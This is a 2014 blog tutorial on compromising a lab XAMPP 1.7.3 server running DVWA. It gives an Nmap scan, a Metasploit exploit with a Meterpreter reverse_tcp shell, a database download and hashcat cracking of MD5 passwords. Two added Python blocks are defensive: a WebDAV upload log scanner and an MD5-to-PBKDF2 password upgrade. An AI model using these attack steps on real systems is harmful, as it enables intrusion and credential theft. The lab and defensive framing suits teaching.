https://suprafortix.wordpress.com/2014/04/17/exploiting-xampp-v1-7-3/
SupraFortix Blog
"The Internet is becoming the town square for the global village of tomorrow."
The next step is finding out what type of software the victim
runs, as we don't know that at the beginning of the hack. Open up
a terminal window in Kali and conduct a version Nmap scan with the
following piece of code. In this case 192.168.1.7 is the victim's IP
address.
When the scan returns some data, we can see the services running
on the victim's server and the open ports they are
communicating on. However, it's still not clear what type of
server it is. A quick Google search of these services will reveal that
the victim is running XAMPP 1.7.3.
(https://suprafortix.files.wordpress.com/2014/04/nmap-scan.png)
Services Turned On
Apache httpd 2.2.14
DAV/2
mod_ssl/2.2.14 OpenSSL/0.9.8l
mod_autoindex_color PHP/5.3.1
mod_apreq2-20090110/2.7.1
mod_perl/2.0.4 Perl/v5.10.1
XAMPP HACKING
Open another terminal window and fire up msfconsole, wait
until it loads, and search for XAMPP vulnerabilities in the Metasploit
database.
msfconsole - starts msfconsole
search xampp - searches for XAMPP vulnerabilities
(https://suprafortix.files.wordpress.com/2014/04/xamppsearch.png)
An exploit shows up with a disclosure date of 14/01/2012. This is
perfect as the release date of XAMPP 1.7.3 was 23/12/2009, so the
Now search for and choose an appropriate payload for this hack. In this
example the payload will open a Meterpreter terminal session,
which allows the attacker to view, download and modify files and
directories on the victim's computer.
show payloads - shows all available payloads
set payload php/meterpreter/reverse_tcp - sets a particular payload
(https://suprafortix.files.wordpress.com/2014/04/selectpayload.png)
Now we need to look at the options that must be set for the hack
to execute successfully.
show options - shows required and non-required options to set up
We can see that some required rows such as LHOST (local host, the
attacker) and RHOST (remote host, the victim) are empty; other
required options such as PATH and RPORT are already filled in by
default.
(https://suprafortix.files.wordpress.com/2014/04/show-optionsarr1.png)
The exploit and the payload now have all the necessary
information to conduct the attack.
exploit - attempts to exploit the target IP address
(https://suprafortix.files.wordpress.com/2014/04/meterpretercommand-prompt.png)
If the pwd (present working directory) command is executed, you can
see that the Meterpreter session has been opened in the
C:\xampp\webdav directory. The database files of the desired website
are not located in this directory, therefore we need to search for
them in the C:\xampp directory.
cd .. - moves to the C:\xampp directory
ls - shows the content of the C:\xampp directory
(https://suprafortix.files.wordpress.com/2014/04/mysqlnd-arr.png)
A directory named mysql is located in C:\xampp\, let's see what's
inside.
(https://suprafortix.files.wordpress.com/2014/04/dvwa-dir.png)
To download all database files, the session needs to move outside
of the dvwa directory into the data directory, where the whole database
directory can be downloaded onto the attacker machine.
cd .. - moves to C:\xampp\mysql\data\
download dvwa - downloads the dvwa directory where the database
files are hidden
(https://suprafortix.files.wordpress.com/2014/04/downloading.png)
The whole source code of the website and other system files or
directories can be downloaded, modified or deleted, or even new
files uploaded; however, that's beyond the scope of this post.
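The Nmap banner above lists DAV/2 and the session landed in C:\xampp\webdav, so the web server's access log is where a defender would look for this kind of compromise. The following is an added example, not code from the original post: it scans Apache combined-format log lines for a successful PUT of a server-executed script followed by a request for that same path. The log lines are constructed, and the assumption that the file arrived through a WebDAV PUT is inferred from that directory rather than stated in the post.

```python
import re

# Constructed Apache "combined" log lines (not taken from the original post).
SAMPLE_LOG = """\
192.168.1.20 - - [17/Apr/2014:10:01:02 +0100] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"
192.168.1.5 - alice [17/Apr/2014:10:02:10 +0100] "PUT /webdav/notes.txt HTTP/1.1" 201 181 "-" "-"
192.168.1.9 - - [17/Apr/2014:10:03:40 +0100] "PUT /webdav/x1.php HTTP/1.1" 401 401 "-" "-"
192.168.1.9 - user [17/Apr/2014:10:03:41 +0100] "PUT /webdav/x1.php HTTP/1.1" 201 181 "-" "-"
192.168.1.9 - - [17/Apr/2014:10:03:42 +0100] "GET /webdav/x1.php HTTP/1.1" 200 0 "-" "-"
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Extensions the server would execute rather than serve as static content.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".pl", ".cgi")


def find_dav_script_uploads(log_text):
    """Return findings as (kind, client_ip, path, timestamp) tuples.

    Only PUT is tracked: MOVE and COPY name their target in the Destination
    header, which the combined log format does not record.
    """
    uploaded = set()   # script paths written by a successful PUT
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0].lower()
        succeeded = m["status"].startswith("2")
        if m["method"] == "PUT" and succeeded and path.endswith(SCRIPT_EXT):
            uploaded.add(path)
            findings.append(("script-upload", m["ip"], path, m["ts"]))
        elif m["method"] in ("GET", "POST") and path in uploaded:
            findings.append(("uploaded-script-requested", m["ip"], path, m["ts"]))
    return findings


if __name__ == "__main__":
    for finding in find_dav_script_uploads(SAMPLE_LOG):
        print(*finding)
```

On a server that does not need WebDAV, disabling the share removes the write path entirely, and any PUT request to it is then worth an alert on its own.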
PASSWORD CRACKING
The downloaded database directory will be located by default in the
\root\ directory on the attacker's machine. Open up another
terminal window and go to the downloaded database directory.
The hashed passwords, usernames and file paths to user pictures
are located in the users.MYD file.
cat users.MYD - shows the contents of the users.MYD file.
(https://suprafortix.files.wordpress.com/2014/04/stolenhashes.png)
The tool that is used to crack the hashes in this example is
HashCat with a RockYou hash dictionary, located in
\root\Desktop.
hashcat -m 0 -a 0 /root/stolenhashes.txt /root/Desktop/rockyou.txt -
will attempt to find the given hashes in the rockyou.txt dictionary.
(https://suprafortix.files.wordpress.com/2014/04/crackedpasswords-arr.png)
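Hashcat mode 0 is raw, unsalted MD5, which is why a plain dictionary run is enough once the users table leaks. The following is an added example, not code from the original post or from DVWA: it audits stored values for bare MD5 and upgrades them to salted PBKDF2 the next time the user logs in. The user rows, the storage format and the iteration count are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import re

ITERATIONS = 600_000                        # assumed work factor; tune per host
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")  # the format `hashcat -m 0` consumes


def hash_password(password):
    """Salted PBKDF2-HMAC-SHA256, stored as scheme$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify(password, stored):
    """Return (ok, replacement).

    replacement is a new salted hash when a legacy MD5 value verified and
    should be overwritten in the database; otherwise it is None.
    """
    if LEGACY_MD5.match(stored):
        candidate = hashlib.md5(password.encode()).hexdigest()
        ok = hmac.compare_digest(candidate, stored)
        return ok, (hash_password(password) if ok else None)
    _scheme, iters, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex), None


def audit(users):
    """Names of accounts whose stored value is still bare MD5."""
    return sorted(n for n, stored in users.items() if LEGACY_MD5.match(stored))


# Constructed rows standing in for a users table (not DVWA's real data).
USERS = {
    "alice": hashlib.md5(b"Sunsh1ne!").hexdigest(),
    "bob": hashlib.md5(b"Sunsh1ne!").hexdigest(),  # same password, same hash
    "carol": hash_password("Sunsh1ne!"),           # salted: unique per row
}

if __name__ == "__main__":
    print("still MD5:", audit(USERS))
    print("login upgrade:", verify("Sunsh1ne!", USERS["alice"]))
```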
(https://suprafortix.files.wordpress.com/2014/04/dvwa-loginpage.png)
SUCCESS!! The attacker now has complete control over the
administrator account.
(https://suprafortix.files.wordpress.com/2014/04/dvwa-loginpage-in.png)